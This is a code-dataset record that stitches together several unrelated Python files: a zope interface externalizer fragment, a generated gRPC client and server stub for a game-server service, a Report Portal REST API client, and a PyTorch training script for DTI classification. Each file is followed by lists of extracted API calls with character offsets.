not implement two unrelated interfaces from the same module.
.. note:: If the object does implement unrelated interfaces, but
one (set) of them is a marker interface (featuring no schema
fields or attributes), then it can be tagged with
``_ext_is_marker_interface`` and it will be excluded when
determining the most derived interfaces. This can correct some
cases that would otherwise raise a TypeError. This tag is not inherited.
"""
_ext_search_module = None
def _ext_find_schema(self, ext_self, iface_upper_bound):
# If the upper bound is given, then let the super class handle it all.
# Presumably the user has given the correct branch to search.
if iface_upper_bound is not None:
return super(ModuleScopedInterfaceObjectIO, self)._ext_find_schema(
ext_self, iface_upper_bound)
most_derived = super(ModuleScopedInterfaceObjectIO, self)._ext_find_schema(
ext_self, interface.Interface)
# In theory, this is now the most derived interface.
# If we have a graph that is not a tree, though, it may not be.
# In that case, we are not suitable for use with this object.
# TODO: This algorithm can and should be better in some cases, following the
# C3 algorithm that __sro__ derivation itself uses.
for iface in self._ext_schemas_to_consider(ext_self):
if iface is most_derived:
# Support interfaces that have their __module__ changed
# dynamically (e.g., test_benchmarks)
continue
if not most_derived.isOrExtends(iface):
raise TypeError(
"Most derived interface %s does not extend %s; non-tree interface structure. "
"Searching module %s and considered %s on object %s of class %s and type %s"
% (most_derived, iface, self._ext_search_module,
list(self._ext_schemas_to_consider(ext_self)),
ext_self, ext_self.__class__,
type(ext_self)))
return most_derived
def _ext_schemas_to_consider(self, ext_self):
search_module_name = self._ext_search_module.__name__
return [x for x in interface.providedBy(ext_self)
if x.__module__ == search_module_name
and not x.queryDirectTaggedValue('_ext_is_marker_interface')]
# pylint:disable=wrong-import-position,wrong-import-order
from nti.externalization._compat import import_c_accel
import_c_accel(globals(), 'nti.externalization._datastructures')
| [
"zope.interface.providedBy",
"zope.interface.classImplements",
"zope.component.getUtility",
"zope.schema.getValidationErrors",
"six.iteritems"
] | [((5448, 5542), 'zope.interface.classImplements', 'interface.classImplements', (['StandardInternalObjectExternalizer', 'IInternalObjectExternalizer'], {}), '(StandardInternalObjectExternalizer,\n IInternalObjectExternalizer)\n', (5473, 5542), False, 'from zope import interface\n'), ((14681, 14756), 'zope.interface.classImplements', 'interface.classImplements', (['AbstractDynamicObjectIO', 'IInternalObjectIOFinder'], {}), '(AbstractDynamicObjectIO, IInternalObjectIOFinder)\n', (14706, 14756), False, 'from zope import interface\n'), ((19795, 19867), 'zope.interface.classImplements', 'interface.classImplements', (['ExternalizableInstanceDict', 'IInternalObjectIO'], {}), '(ExternalizableInstanceDict, IInternalObjectIO)\n', (19820, 19867), False, 'from zope import interface\n'), ((13457, 13474), 'six.iteritems', 'iteritems', (['parsed'], {}), '(parsed)\n', (13466, 13474), False, 'from six import iteritems\n'), ((25100, 25130), 'zope.interface.providedBy', 'interface.providedBy', (['ext_self'], {}), '(ext_self)\n', (25120, 25130), False, 'from zope import interface\n'), ((32087, 32130), 'zope.schema.getValidationErrors', 'schema.getValidationErrors', (['iface', 'ext_self'], {}), '(iface, ext_self)\n', (32113, 32130), False, 'from zope import schema\n'), ((36765, 36795), 'zope.interface.providedBy', 'interface.providedBy', (['ext_self'], {}), '(ext_self)\n', (36785, 36795), False, 'from zope import interface\n'), ((29663, 29707), 'zope.component.getUtility', 'getUtility', (['IAnonymousObjectFactory', 'factory'], {}), '(IAnonymousObjectFactory, factory)\n', (29673, 29707), False, 'from zope.component import getUtility\n')] |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from server import server_model_pb2 as server_dot_server__model__pb2
from server import server_pb2 as server_dot_server__pb2
class MruVServerServiceStub(object):
"""The MruV server service provides procedures for managing game platform server actions.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.RegisterServer = channel.unary_unary(
'/mruv.server.MruVServerService/RegisterServer',
request_serializer=server_dot_server__model__pb2.ServerInfo.SerializeToString,
response_deserializer=server_dot_server__model__pb2.ServerID.FromString,
)
self.GetRegisteredServers = channel.unary_unary(
'/mruv.server.MruVServerService/GetRegisteredServers',
request_serializer=server_dot_server__pb2.GetRegisteredServersRequest.SerializeToString,
response_deserializer=server_dot_server__pb2.GetRegisteredServersResponse.FromString,
)
self.GetServerInfo = channel.unary_unary(
'/mruv.server.MruVServerService/GetServerInfo',
request_serializer=server_dot_server__model__pb2.ServerID.SerializeToString,
response_deserializer=server_dot_server__model__pb2.ServerInfo.FromString,
)
self.UpdateServerStatus = channel.unary_unary(
'/mruv.server.MruVServerService/UpdateServerStatus',
request_serializer=server_dot_server__pb2.UpdateServerStatusRequest.SerializeToString,
response_deserializer=server_dot_server__pb2.UpdateServerStatusResponse.FromString,
)
self.ServerEventsStream = channel.unary_stream(
'/mruv.server.MruVServerService/ServerEventsStream',
request_serializer=server_dot_server__pb2.ServerEventsStreamRequest.SerializeToString,
response_deserializer=server_dot_server__pb2.ServerEvent.FromString,
)
class MruVServerServiceServicer(object):
"""The MruV server service provides procedures for managing game platform server actions.
"""
def RegisterServer(self, request, context):
"""Register instance of server for further managing.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetRegisteredServers(self, request, context):
"""Get all registered servers.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetServerInfo(self, request, context):
"""Get game server status.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateServerStatus(self, request, context):
"""Update game server status.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ServerEventsStream(self, request, context):
"""Stream of server events. Events are streamed back in real-time for chosen server.
TODO: Change name to: SubscribeServerEvents
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MruVServerServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'RegisterServer': grpc.unary_unary_rpc_method_handler(
servicer.RegisterServer,
request_deserializer=server_dot_server__model__pb2.ServerInfo.FromString,
response_serializer=server_dot_server__model__pb2.ServerID.SerializeToString,
),
'GetRegisteredServers': grpc.unary_unary_rpc_method_handler(
servicer.GetRegisteredServers,
request_deserializer=server_dot_server__pb2.GetRegisteredServersRequest.FromString,
response_serializer=server_dot_server__pb2.GetRegisteredServersResponse.SerializeToString,
),
'GetServerInfo': grpc.unary_unary_rpc_method_handler(
servicer.GetServerInfo,
request_deserializer=server_dot_server__model__pb2.ServerID.FromString,
response_serializer=server_dot_server__model__pb2.ServerInfo.SerializeToString,
),
'UpdateServerStatus': grpc.unary_unary_rpc_method_handler(
servicer.UpdateServerStatus,
request_deserializer=server_dot_server__pb2.UpdateServerStatusRequest.FromString,
response_serializer=server_dot_server__pb2.UpdateServerStatusResponse.SerializeToString,
),
'ServerEventsStream': grpc.unary_stream_rpc_method_handler(
servicer.ServerEventsStream,
request_deserializer=server_dot_server__pb2.ServerEventsStreamRequest.FromString,
response_serializer=server_dot_server__pb2.ServerEvent.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'mruv.server.MruVServerService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class MruVServerService(object):
"""The MruV server service provides procedures for managing game platform server actions.
"""
@staticmethod
def RegisterServer(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/mruv.server.MruVServerService/RegisterServer',
server_dot_server__model__pb2.ServerInfo.SerializeToString,
server_dot_server__model__pb2.ServerID.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetRegisteredServers(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/mruv.server.MruVServerService/GetRegisteredServers',
server_dot_server__pb2.GetRegisteredServersRequest.SerializeToString,
server_dot_server__pb2.GetRegisteredServersResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetServerInfo(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/mruv.server.MruVServerService/GetServerInfo',
server_dot_server__model__pb2.ServerID.SerializeToString,
server_dot_server__model__pb2.ServerInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateServerStatus(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/mruv.server.MruVServerService/UpdateServerStatus',
server_dot_server__pb2.UpdateServerStatusRequest.SerializeToString,
server_dot_server__pb2.UpdateServerStatusResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ServerEventsStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/mruv.server.MruVServerService/ServerEventsStream',
server_dot_server__pb2.ServerEventsStreamRequest.SerializeToString,
server_dot_server__pb2.ServerEvent.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| [
"grpc.unary_stream_rpc_method_handler",
"grpc.method_handlers_generic_handler",
"grpc.unary_unary_rpc_method_handler",
"grpc.experimental.unary_stream",
"grpc.experimental.unary_unary"
] | [((5640, 5734), 'grpc.method_handlers_generic_handler', 'grpc.method_handlers_generic_handler', (['"""mruv.server.MruVServerService"""', 'rpc_method_handlers'], {}), "('mruv.server.MruVServerService',\n rpc_method_handlers)\n", (5676, 5734), False, 'import grpc\n'), ((3974, 4200), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.RegisterServer'], {'request_deserializer': 'server_dot_server__model__pb2.ServerInfo.FromString', 'response_serializer': 'server_dot_server__model__pb2.ServerID.SerializeToString'}), '(servicer.RegisterServer,\n request_deserializer=server_dot_server__model__pb2.ServerInfo.\n FromString, response_serializer=server_dot_server__model__pb2.ServerID.\n SerializeToString)\n', (4009, 4200), False, 'import grpc\n'), ((4299, 4554), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.GetRegisteredServers'], {'request_deserializer': 'server_dot_server__pb2.GetRegisteredServersRequest.FromString', 'response_serializer': 'server_dot_server__pb2.GetRegisteredServersResponse.SerializeToString'}), '(servicer.GetRegisteredServers,\n request_deserializer=server_dot_server__pb2.GetRegisteredServersRequest\n .FromString, response_serializer=server_dot_server__pb2.\n GetRegisteredServersResponse.SerializeToString)\n', (4334, 4554), False, 'import grpc\n'), ((4646, 4870), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.GetServerInfo'], {'request_deserializer': 'server_dot_server__model__pb2.ServerID.FromString', 'response_serializer': 'server_dot_server__model__pb2.ServerInfo.SerializeToString'}), '(servicer.GetServerInfo,\n request_deserializer=server_dot_server__model__pb2.ServerID.FromString,\n response_serializer=server_dot_server__model__pb2.ServerInfo.\n SerializeToString)\n', (4681, 4870), False, 'import grpc\n'), ((4968, 5217), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.UpdateServerStatus'], {'request_deserializer': 'server_dot_server__pb2.UpdateServerStatusRequest.FromString', 'response_serializer': 'server_dot_server__pb2.UpdateServerStatusResponse.SerializeToString'}), '(servicer.UpdateServerStatus,\n request_deserializer=server_dot_server__pb2.UpdateServerStatusRequest.\n FromString, response_serializer=server_dot_server__pb2.\n UpdateServerStatusResponse.SerializeToString)\n', (5003, 5217), False, 'import grpc\n'), ((5314, 5549), 'grpc.unary_stream_rpc_method_handler', 'grpc.unary_stream_rpc_method_handler', (['servicer.ServerEventsStream'], {'request_deserializer': 'server_dot_server__pb2.ServerEventsStreamRequest.FromString', 'response_serializer': 'server_dot_server__pb2.ServerEvent.SerializeToString'}), '(servicer.ServerEventsStream,\n request_deserializer=server_dot_server__pb2.ServerEventsStreamRequest.\n FromString, response_serializer=server_dot_server__pb2.ServerEvent.\n SerializeToString)\n', (5350, 5549), False, 'import grpc\n'), ((6311, 6643), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/mruv.server.MruVServerService/RegisterServer"""', 'server_dot_server__model__pb2.ServerInfo.SerializeToString', 'server_dot_server__model__pb2.ServerID.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/mruv.server.MruVServerService/RegisterServer',\n server_dot_server__model__pb2.ServerInfo.SerializeToString,\n server_dot_server__model__pb2.ServerID.FromString, options,\n channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (6340, 6643), False, 'import grpc\n'), ((7006, 7367), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/mruv.server.MruVServerService/GetRegisteredServers"""', 'server_dot_server__pb2.GetRegisteredServersRequest.SerializeToString', 'server_dot_server__pb2.GetRegisteredServersResponse.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/mruv.server.MruVServerService/GetRegisteredServers',\n server_dot_server__pb2.GetRegisteredServersRequest.SerializeToString,\n server_dot_server__pb2.GetRegisteredServersResponse.FromString, options,\n channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (7035, 7367), False, 'import grpc\n'), ((7723, 8054), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/mruv.server.MruVServerService/GetServerInfo"""', 'server_dot_server__model__pb2.ServerID.SerializeToString', 'server_dot_server__model__pb2.ServerInfo.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/mruv.server.MruVServerService/GetServerInfo',\n server_dot_server__model__pb2.ServerID.SerializeToString,\n server_dot_server__model__pb2.ServerInfo.FromString, options,\n channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (7752, 8054), False, 'import grpc\n'), ((8415, 8770), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/mruv.server.MruVServerService/UpdateServerStatus"""', 'server_dot_server__pb2.UpdateServerStatusRequest.SerializeToString', 'server_dot_server__pb2.UpdateServerStatusResponse.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/mruv.server.MruVServerService/UpdateServerStatus',\n server_dot_server__pb2.UpdateServerStatusRequest.SerializeToString,\n server_dot_server__pb2.UpdateServerStatusResponse.FromString, options,\n channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (8444, 8770), False, 'import grpc\n'), ((9131, 9472), 'grpc.experimental.unary_stream', 'grpc.experimental.unary_stream', (['request', 'target', '"""/mruv.server.MruVServerService/ServerEventsStream"""', 'server_dot_server__pb2.ServerEventsStreamRequest.SerializeToString', 'server_dot_server__pb2.ServerEvent.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/mruv.server.MruVServerService/ServerEventsStream',\n server_dot_server__pb2.ServerEventsStreamRequest.SerializeToString,\n server_dot_server__pb2.ServerEvent.FromString, options,\n channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (9161, 9472), False, 'import grpc\n')] |
# Copyright (c) 2018 <NAME> & Company, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
import json
import urllib.parse
from copy import deepcopy
from sast_controller.drivers.rp import URLS
class ReportPortalService:
"""
Service that realise Report Portal REST API
"""
def __init__(self, host, token):
"""
:param host:
Report Portal host URL
:param token:
Report Portal API token
"""
self._token = token
headers = {
'Accept': 'application/json',
'Authorization': f'bearer {self._token}',
'Content-type': 'application/json;charset=UTF-8'}
self.report_portal_link = host
self.ses = requests.Session()
self.ses.headers.update(headers)
self.urls = deepcopy(URLS)
def close_session(self):
"""Close Report Portal session"""
self.ses.close()
def send_request(self, method, url, body=None, status_codes=None, verify=False):
"""
Send request to Report Portal API
:param method:
HTTP method
:param url:
request URL
:param body:
request body
:param status_codes:
list of acceptable status codes
:param verify:
set True to verify ssl certificate
:return:
@:raise Exception in case if response code not in status codes
"""
if status_codes is None:
status_codes = [200]
url_ = urllib.parse.urljoin(self.report_portal_link, url)
if method == "GET":
response = self.ses.get(url_, verify=verify)
elif method == "POST":
response = self.ses.post(url_, body, verify=verify)
elif method == "PUT":
response = self.ses.put(url_, body, verify=verify)
else:
raise Exception(f"Unsupported request method {method}")
if response.status_code in status_codes:
return json.loads(response.text)
if response.text.find('invalid_token') > -1:
raise AssertionError("Invalid Report Portal UUID token. Please verify RP_TOKEN param.")
raise Exception(f"Wrong response.\n"
f"{method} {self.report_portal_link + url}\n"
f"Status code {response.status_code}\n "
f"{response.text}")
def get_launch_info_by_number(self, project, scan_name, number):
"""
GET /api/v1/{project}/launch?filter.eq.name={scan}&page.sort=number%2Cdesc&page.page={page}&page.size={size}
:param project:
:param scan_name:
:param number:
:return:
launch ID,
{
"owner": "",
"share": ,
"id": "",
"name": "",
"number": 4,
"start_time": ,
"end_time": ,
"status": "",
"statistics": {
"executions": {
"total": "",
"passed": "",
"failed": "",
"skipped": "0"
},
"defects": {
}
},
"mode": "DEFAULT",
"isProcessing": false,
"approximateDuration": ,
"hasRetries": false
}
"""
url = self.urls["get_launch_list_url"].format(
project=project, scan=urllib.parse.quote_plus(scan_name),
page=number, size=1)
launch_list = self.send_request("GET", url)
try:
content = launch_list['content'][0]
except IndexError:
raise IndexError(
'There is no {launch} inside {project} project.'
'\nPlease double check Launch name and Project Name.'.format(
launch=scan_name, project=project))
launch_id = content['id']
return launch_id, launch_list
def get_launch_info(self, project, launch_id):
"""
GET /api/v1/{project}/item?filter.eq.launch={launch_id}&page.page={page}
:param project:
:param launch_id:
:return:
{
"content": [],
"page": {
"number": 1,
"size": 20,
"totalElements": 0,
"totalPages": 0
}
}
"""
info_list = []
page = 1
total_pages = 1
while page <= total_pages:
url = self.urls["get_launch_info_url"].format(project=project,
launch_id=launch_id,
page=page)
req = self.send_request("GET", url)
info_list.append(req)
total_pages = int(req['page']['totalPages'])
page += 1
return info_list
def compare_launches(self, project, current_launch, previous_launch):
"""
GET /api/v1/{project}/launch/compare?ids={current_launch}&ids={previous_launch}
:param project:
:param current_launch:
:param previous_launch:
:return:
{
"result": [
{
"values": {},
"name": "",
"startTime": "",
"number": "",
"id": ""
}
]
}
"""
url = self.urls["compare_url"].format(project=project,
current_launch=current_launch,
previous_launch=previous_launch)
return self.send_request("GET", url)
def get_test_item_log(self, project, test_item):
"""
GET /api/v1/{project}/log?filter.eq.item={test_item}&page.page={page}&page.size=100&page.sort=time%2CASC
:param project:
:param test_item:
:return:
{
"content": [
{
"id": "",
"time": ,
"message": "",
"level": "",
"test_item": ""
}
],
"page": {
"number": 1,
"size": 20,
"totalElements": 3,
"totalPages": 1
}
}
"""
content = []
total_pages = 1
page = 1
while page <= total_pages:
url = self.urls["get_log"].format(project=project,
test_item=test_item,
page=page)
response = self.send_request("GET", url)
content += response["content"]
total_pages = int(response['page']['totalPages'])
page += 1
return content
def get_prj_info(self, prj):
"""
GET /api/v1/project/{project}
:param prj:
:return:
{
"addInfo": "string",
"configuration": {
"analyzer_mode": "ALL",
"emailConfiguration": {
},
"entryType": "string",
"externalSystem": [
],
"interruptedJob": "ONE_HOUR",
"isAutoAnalyzerEnabled": true,
"keepLogs": "TWO_WEEKS",
"keepScreenshots": "ONE_WEEK",
"projectSpecific": "string",
"statisticCalculationStrategy": "STEP_BASED",
"subTypes": {}
},
"creationDate": "2019-03-27T12:26:56.203Z",
"customer": "string",
"projectId": "string",
"users": [
{
"login": "string",
"projectRole": "string",
"proposedRole": "string"
}
]
}
"""
url = self.urls["get_project_info_url"].format(project=prj)
return self.send_request("GET", url, status_codes=[200, 404])
def get_external_system_info(self, project_):
"""
Get external system config
:raise IndexError if no external system in project
:return
{
"accessKey": "string",
"domain": "string",
"fields": [
{
"definedValues": [
{
"valueId": "string",
"valueName": "string"
}
],
"fieldName": "string",
"fieldType": "string",
"id": "string",
"required": true,
"value": [
"string"
]
}
],
"id": "string",
"project": "string",
"projectRef": "string",
"systemAuth": "string",
"systemType": "string",
"url": "string",
"username": "string"
}
"""
project_info = self.get_prj_info(project_)
external_system = project_info["configuration"]["externalSystem"]
if len(external_system) == 0:
raise IndexError("No available external system. Please create one.")
return external_system[0]
def create_project(self, project_name):
"""
Create project is project not exists
POST /api/v1/project
:param project_name:
"""
project_info = self.get_prj_info(project_name)
if 'Did you use correct project name?' in str(project_info):
url = '/api/v1/project'
post_body = {
"entryType": "INTERNAL",
"projectName": project_name
}
return self.send_request("POST", url, json.dumps(post_body), status_codes=[201])
return 'Project already exist'
def update_ext_sys(self, prj, sys_id, params):
"""
POST /api/v1/{prj}/external-system/{sys_id}
params:
{"url":"","systemType":"JIRA","systemAuth":"BASIC","project":"",
"fields":[{"fieldName":"Issue Type","id":"issuetype","fieldType":"issuetype","required":true,
"value":[""],"definedValues":[]},
{"fieldName":"Summary","id":"summary","fieldType":"string","required":true,"definedValues":[],
"value":[""]},
{"fieldName":"Assignee","id":"assignee","fieldType":"user","required":true,"definedValues":[],
"value":["test"]}]}
:return:
"""
url = f'/api/v1/{prj}/external-system/{sys_id}'
return self.send_request("PUT", url, json.dumps(params))
def assign_users(self, prj, users):
"""
PUT /api/v1/project/test_new_prj_new/assign
params:
{"userNames":{"user":"ADMIN"}}
:return:
"""
url = f'/api/v1/project/{prj}/assign'
return self.send_request("PUT", url, json.dumps(users))
def setup_external_sys(self, project, params):
"""
POST /api/v1/{project}/external-system
params:
{
"domain": "",
"password": "<PASSWORD>",
"project": "",
"systemAuth": "Basic",
"systemType": "JIRA",
"url": "",
"username": "userId"
}
:return:
"""
url = f'/api/v1/{project}/external-system'
return self.send_request("POST", url, json.dumps(params), status_codes=[201])
def put_issue_status(self, project, body_params):
"""
PUT /api/v1/{project}/item
:param project:
:param body_params:
:return:
"""
url = self.urls["put_item_url"].format(project=project)
put_body = '{"issues": [{"issue": {"issue_type": "%s",' \
'"autoAnalyzed": false,"ignoreAnalyzer": false},' \
'"test_item_id": "%s"}]}' % (body_params["issue_type"], body_params["test_item_id"])
return self.send_request("PUT", url, put_body)
| [
"json.loads",
"json.dumps",
"requests.Session",
"copy.deepcopy"
] | [((1252, 1270), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1268, 1270), False, 'import requests\n'), ((1332, 1346), 'copy.deepcopy', 'deepcopy', (['URLS'], {}), '(URLS)\n', (1340, 1346), False, 'from copy import deepcopy\n'), ((2521, 2546), 'json.loads', 'json.loads', (['response.text'], {}), '(response.text)\n', (2531, 2546), False, 'import json\n'), ((11390, 11408), 'json.dumps', 'json.dumps', (['params'], {}), '(params)\n', (11400, 11408), False, 'import json\n'), ((11699, 11716), 'json.dumps', 'json.dumps', (['users'], {}), '(users)\n', (11709, 11716), False, 'import json\n'), ((12194, 12212), 'json.dumps', 'json.dumps', (['params'], {}), '(params)\n', (12204, 12212), False, 'import json\n'), ((10543, 10564), 'json.dumps', 'json.dumps', (['post_body'], {}), '(post_body)\n', (10553, 10564), False, 'import json\n')] |
import logging
import time
from torch.utils.data import DataLoader
import torch.nn as nn
import torch.optim as optim
import torch.backends.cudnn as cudnn
import torch
import torch.nn.functional as functional
import numpy as np
from DTI import models, dataset, cli, utils, analyse
import os
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
def main():
utils.setup_seed(18)
start_time = time.time()
# 数据集加载
train_set = dataset.CreateDataset(dataset.get_hcp_s1200(), usage='train')
val_set = dataset.CreateDataset(dataset.get_hcp_s1200(), usage='val')
train_loader = DataLoader(train_set, batch_size=args.batch_size, drop_last=False, shuffle=True, pin_memory=True,
num_workers=args.num_workers)
val_loader = DataLoader(val_set, batch_size=args.batch_size, drop_last=True, shuffle=True, pin_memory=True,
num_workers=args.num_workers)
# 网络加载
# if args.MODEL == '1D-CNN':
if args.INPUT_FEATURES != '4' and args.INPUT_FEATURES != 'all':
c = 1
else:
c = 4
if args.MODEL == '1D-CNN':
model = models.HARmodel(c, args.NUM_CLASSES).to(device)
elif args.MODEL == 'CAM-CNN':
model = models.CAM_CNN(c, args.NUM_CLASSES).to(device)
else:
model = None
if os.path.exists(args.LOAD_PATH):
model.load_state_dict(torch.load(args.LOAD_PATH))
optimizer = torch.optim.SGD(model.parameters(), lr=args.LR)
# 训练
val_loss = []
train_loss = []
val_acc = []
train_acc = []
val_precision = []
val_recall = []
# 打印训练信息
LOG.info("Args:{}".format(args))
for epoch in range(args.epochs):
train_results = train(train_loader, model, optimizer, epoch)
val_results = validation(model, val_loader)
# 训练结果记录
train_loss.append(train_results['train_loss'])
train_acc.append(train_results['train_acc'])
val_loss.append(val_results['val_loss'])
val_acc.append(val_results['val_acc'])
val_precision.append(val_results['val_precision'])
val_recall.append(val_results['val_recall'])
# 训练结果存档
torch.save(model.state_dict(), '.\\LOG\\{}.pkl'.format(time.strftime("%Y%m%d-%H%M%S", time.localtime())))
f = open(args.RECORD_PATH, 'a+')
f.writelines('args'+str(args)+'\n')
f.writelines('train_loss'+str(train_loss)+'\n')
f.writelines('train_acc' + str(train_acc)+'\n')
f.writelines('val_loss' + str(val_loss)+'\n')
f.writelines('val_acc' + str(val_acc)+'\n')
f.writelines('val_precision' + str(val_precision)+'\n')
f.writelines('val_recall' + str(val_recall)+'\n')
f.close()
LOG.info("--- main.py finish in %s seconds ---" % (time.time() - start_time))
def train(dataloader, model, optimizer, epoch):
model.train()
train_loss = 0
train_correct = 0
start_time = time.time()
for batch_index, batch_samples in enumerate(dataloader):
# 1.load data to CUDA
x, y = batch_samples['x'].to(device), batch_samples['y'].to(device)
if args.INPUT_FEATURES != '4' and args.INPUT_FEATURES != 'all':
x = x.unsqueeze(1)
else:
x = x.transpose(1, 2)
# 2.forward
output = model(x)
criteria = nn.CrossEntropyLoss()
loss = criteria(output, y.long())
# 3.backward
optimizer.zero_grad() # 把所有Variable的grad成员数值变为0
loss.backward() # 反向传播grad
optimizer.step() # 每个Variable的grad都被计算出来后,更新每个Variable的数值(优化更新)
# 6.result
pred = output.argmax(dim=1, keepdim=True)
train_correct += pred.eq(y.long().view_as(pred)).sum().item()
train_loss += loss
if batch_index % args.display_batch == 0:
LOG.info("--- training progress rate {}/{} ---".format(batch_index, len(dataloader)))
LOG.info("--- training epoch {} finish in {} seconds ---".format(epoch, (time.time() - start_time)))
LOG.info('\tLoss:{}\tCorrect:{}/{}({})'
.format(train_loss, train_correct, len(dataloader.dataset),
train_correct / len(dataloader.dataset)))
return {
'train_loss': round(train_loss.tolist(), 4),
'train_acc': round(train_correct / len(dataloader.dataset), 4)
}
def validation(model, val_loader):
model.eval()
test_loss = 0
correct = 0
start_time = time.time()
with torch.no_grad():
pred_list = []
target_list = []
for batch_index, batch_samples in enumerate(val_loader):
# 1.load data to CUDA
x, y = batch_samples['x'].to('cuda'), batch_samples['y'].to('cuda')
if args.INPUT_FEATURES != '4' and args.INPUT_FEATURES != 'all':
x = x.unsqueeze(1)
else:
x = x.transpose(2, 1)
# 2.forward
output = model(x)
pred = output.argmax(dim=1, keepdim=True)
# 3.result
criteria = nn.CrossEntropyLoss()
test_loss += criteria(output, y)
correct += pred.eq(y.view_as(pred)).sum().item()
y = y.cpu().numpy()
pred_list = np.append(pred_list, pred.cpu().numpy())
target_list = np.append(target_list, y)
LOG.info("--- validation epoch finish in {} seconds --- Loss:{}\tCorrect:{}/{}({})"
.format(time.time() - start_time, test_loss, correct, len(val_loader.dataset), correct / len(val_loader.dataset)))
val_result = analyse.analyse_3class(target_list, pred_list)
return {
'val_loss': round(test_loss.cpu().numpy().tolist(), 4),
'val_acc': round(correct / len(val_loader.dataset), 4),
'val_precision': val_result['precision'],
'val_recall': val_result['recall'],
}
if __name__ == '__main__':
LOG = logging.getLogger('main')
logging.basicConfig(level=logging.INFO)
args = cli.create_parser().parse_args()
main()
| [
"logging.getLogger",
"os.path.exists",
"logging.basicConfig",
"DTI.dataset.get_hcp_s1200",
"DTI.models.HARmodel",
"torch.nn.CrossEntropyLoss",
"DTI.utils.setup_seed",
"torch.load",
"numpy.append",
"torch.cuda.is_available",
"DTI.analyse.analyse_3class",
"DTI.cli.create_parser",
